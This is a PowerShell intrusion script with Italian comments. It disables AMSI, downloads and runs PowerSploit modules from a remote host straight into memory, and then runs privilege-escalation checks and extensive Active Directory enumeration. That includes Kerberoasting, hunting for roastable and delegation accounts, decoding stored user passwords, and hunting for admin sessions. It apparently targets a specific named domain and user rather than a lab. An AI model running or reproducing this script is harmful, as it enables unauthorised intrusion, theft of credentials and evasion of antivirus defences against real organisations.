########################################################################### # RICORDA DI FARE CTRL+F SU #! PER CERCARE COMANDI DA FARE MANUALMENTE!!! # ########################################################################### # bypass AMSI (servizio che detecta righe di ps malevoli a runtime) per la sessione di questa shell $a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils' $assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u)) $field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static') $field.SetValue($null,$true) # importa https://github.com/AlecMcCutcheon/ImportFromURL per caricare PowerSploit da remoto senza passare dal disco New-Module -Name ImportFromURL -ScriptBlock ([Scriptblock]::Create((New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/AlecMcCutcheon/ImportFromURL/main/ImportFromURL.psm1"))) # importiamo PowerSploit ora che AMSI e' fuori uso # importa Recon da PowerSploit iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Recon/Get-ComputerDetail.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Recon/Get-HttpStatus.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Recon/Invoke-CompareAttributesForClass.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Recon/Invoke-Portscan.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Recon/PowerView.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Recon/Recon.psd1")) # importa AntivirusBypass da PowerSploit iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/AntivirusBypass/Find-AVSignature.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/AntivirusBypass/AntivirusBypass.psd1")) # importa Persistence da PowerSploit iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Persistence/Persistence.psm1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Persistence/Persistence.psd1")) # importa Privsec da PowerSploit iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Privesc/Get-System.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Privesc/PowerUp.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/Privesc/Privesc.psd1")) # importa ScriptModification da PowerSploit iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/ScriptModification/Out-CompressedDll.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/ScriptModification/Out-EncodedCommand.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/ScriptModification/Out-EncryptedScript.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/ScriptModification/Remove-Comment.ps1")) iex ((New-Object System.Net.WebClient).DownloadString("https://dl.crihexe.com/powersploit/PowerSploit/ScriptModification/ScriptModification.psd1")) # ora PowerSploit e i suoi moduli importanti sono importati, usiamo innanzitutto Privsec per cercare misconfigurations per provare ad ottenere privilegi Invoke-PrivescAudit Find-ProcessDLLHijack Find-PathDLLHijack Get-CachedGPPPassword Get-ApplicationHost Get-Webconfig Get-RegistryAlwaysInstallElevated Get-RegistryAutoLogon Get-ModifiableRegistryAutoRun Get-ModifiableService Get-ProcessTokenGroup Get-ProcessTokenPrivilege #! sarebbe poi in base agli scorsi 2 comandi, da provare questo qui sotto, Enable-Privilage che forse riesce a provare un escalation #Enable-Privilege # ora usiamo Recon per AD (https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview) Get-NetDomain #Basic domain info #User info Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set Get-NetUser -PreauthNotRequired #ASREPRoastable users Get-NetUser -SPN #Kerberoastable users #Groups info Get-NetGroup | select samaccountname, admincount, description #! TODO manualmente #Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=EGOTISTICAL-BANK,DC=local' | %{ $_.SecurityIdentifier } | Convert-SidToName #Get AdminSDHolders #Computers Get-NetComputer | select samaccountname, operatingsystem Get-NetComputer -Unconstrainusered | select samaccountname #DCs always appear but aren't useful for privesc Get-NetComputer -TrustedToAuth | select samaccountname #Find computers with Constrained Delegation Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups #Shares Find-DomainShare -CheckShareAccess #Search readable shares #Domain trusts Get-NetDomainTrust #Get all domain trusts (parent, children and external) Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found #LHF #Check if any user passwords are set $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl #Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened. Find-LocalAdminAccess #Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host. If -Checkaccess, then it also check for LocalAdmin access in the hosts. Invoke-UserHunter -CheckAccess #Find interesting ACLs Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl # Domain Info Get-Domain #Get info about the current domain Get-NetDomain #Get info about the current domain Get-DomainSID #Get domain SID # Policy Get-DomainPolicy #Get info about the policy (Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge) (Get-DomainPolicy)."SystemAccess" #Password policy Get-DomainPolicyData | select -ExpandProperty SystemAccess #Same as previous (Get-DomainPolicy).PrivilegeRights #Check your privileges Get-DomainPolicyData # Same as Get-DomainPolicy # Domain Controller Get-DomainController | select Forest, Domain, IPAddress, Name, OSVersion | fl # Get specific info of current domain controller #! SE NON VA QUESTO RICORDA DI CONTROLLARE BENE IL DOMAIN INSERITO Get-NetDomainController -Domain iav.it #Get all ifo of specific domain Domain Controller # Get Forest info Get-ForestDomain # Users ## Get usernames and their groups Get-DomainUser -Properties name, MemberOf | fl ## Get-DomainUser and Get-NetUser are kind of the same Get-NetUser #Get users with several (not all) properties Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount #List all usernames #! TODO A MANO #Get-NetUser -UserName student107 #Get info about a user Get-NetUser -properties name, description #Get all descriptions Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount #Get all pwdlastset, logoncount and badpwdcount Find-UserField -SearchField Description -SearchTerm "built" #Search account with "something" in a parameter # Get users with reversible encryption (PWD in clear text with dcsync) Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol # Users Filters Get-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname #All enabled users Get-NetUser -UACFilter ACCOUNTDISABLE #All disabled users Get-NetUser -UACFilter SMARTCARD_REQUIRED #Users that require a smart card Get-NetUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname #Not smart card users Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set Get-NetUser -PreauthNotRequired #ASREPRoastable users Get-NetUser -SPN | select serviceprincipalname #Kerberoastable users #! forse questo qui sotto e' da fare a mano perche' non mi ricordo se Domain Admins e' il nome del group degli admin oppure se era in italiano. guarda il dump comunque, c'e' sicuro li' Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'} #Domain admins kerberostable Get-Netuser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto #Constrained Resource Delegation Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marked as sensitive/not for delegation #! questo qui sotto VA FATTO A MANO, sostituisci dc=dev,dc=testlab,dc=local con parametri veri!!! # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) #Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { # ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') #} # Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy ## Users with this flag might have empty passwords (if allowed) or shorter passwords Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol #Groups Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName ## Get-DomainGroup is similar to Get-NetGroup Get-NetGroup #Get groups #! occhio al dominio Get-NetGroup -Domain iav.it #Get groups of an specific domain #! occhio al group, riguarda commenti precedenti Get-NetGroup 'Domain Admins' #Get all data of a group Get-NetGroup -AdminCount | select name,memberof,admincount,member | fl #Search admin grups #! TODO a mano myusername va cambiato e provato con alcuni username Get-NetGroup -UserName "dinicola.cri.2005" #Get groups of a user Get-NetGroupMember -Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this grup, the -Recurse option will print the users inside the others groups also #! occhio al dominio e al Enterprise Admins Get-NetGroupMember -Identity "Enterprise Admins" -Domain iav.it #Remember that "Enterprise Admins" group only exists in the rootdomain of the forest #! per i prossimi 3, non so cos'e' e' strano #Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get Local groups of a machine (you need admin rights in no DC hosts) #Get-NetLocalGroupMember -computername dcorp-dc.dollarcorp.moneycorp.local #Get users of localgroups in computer #Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs #Check AdminSDHolder users Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} #Get ObjectACLs by sid Get-NetGPOGroup #Get restricted groups # Computers Get-DomainComputer -Properties DnsHostName # Get all domain maes of computers ## Get-DomainComputer is kind of the same as Get-NetComputer Get-NetComputer #Get all computer objects Get-NetComputer -Ping #Send a ping to check if the computers are working Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc Get-NetComputer -TrustedToAuth #Find computers with Constrined Delegation Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups #OU Get-DomainOU -Properties Name | sort -Property Name #Get names of OUs Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties Name} #Get all computers inside an OU (Servers in this case) ## Get-DomainOU is kind of the same as Get-NetOU Get-NetOU #Get Organization Units #! non so probabilmente come da commento qui sotto e' da cambiare StudentMachines Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case) #! todo qui https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview#group-policy-object-gpos #! todo qui https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview#acl Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers Find-DomainShare -CheckShareAccess #Search readable shares Find-InterestingDomainShareFile #Find interesting files, can use filters Get-NetDomainTrust #Get all domain trusts (parent, children and external) Get-DomainTrust #Same Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found Get-DomainTrustMapping #Enumerate also all the trusts Get-ForestDomain # Get basic forest info Get-ForestGlobalCatalog Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)" Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between a child and a root is just an external trust) Get-DomainForeingUser #Get users with privileges in other domains inside the forest Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest #Check if any user passwords are set $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl #Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened. Find-LocalAdminAccess #! TODO a mano. la lista di computers e' reperibile dal dump #(This time you need to give the list of computers in the domain) Do the same as before but trying to execute a WMI action in each computer (admin privs are needed to do so). Useful if RCP and SMB ports are closed. #.\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt #! TODO a mano. MOLTO UTILE SECONDO ME #! #Enumerate machines where a particular user/group identity has local admin rights #Get-DomainGPOUserLocalGroupMapping -Identity # Enumerates the members of specified local group (default administrators) # for all the targeted machines on the current (or specified) domain. Invoke-EnumerateLocalAdmin Find-DomainLocalGroupMember #Search unconstrained delegation computers and show users Find-DomainUserLocation -ComputerUnconstrained -ShowAll #Admin users that allow delegation, logged into servers that allow unconstrained delegation Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation #Get members from Domain Admins (default) and a list of computers # and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host. # If -Checkaccess, then it also check for LocalAdmin access in the hosts. ## By default users inside Domain Admins are searched Find-DomainUserLocation [-CheckAccess] | select UserName, SessionFromName Invoke-UserHunter [-CheckAccess] #Search "RDPUsers" users Invoke-UserHunter -GroupName "RDPUsers" #It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers) Invoke-UserHunter -Stealth #! TODO a mano forse https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview#deleted-objects #! dai un'occhiata qui a TUTTO https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview#misc Invoke-Kerberoast [-Identity websvc] #! occhio qui: Without "-Identity" kerberoast all possible users #! https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters#users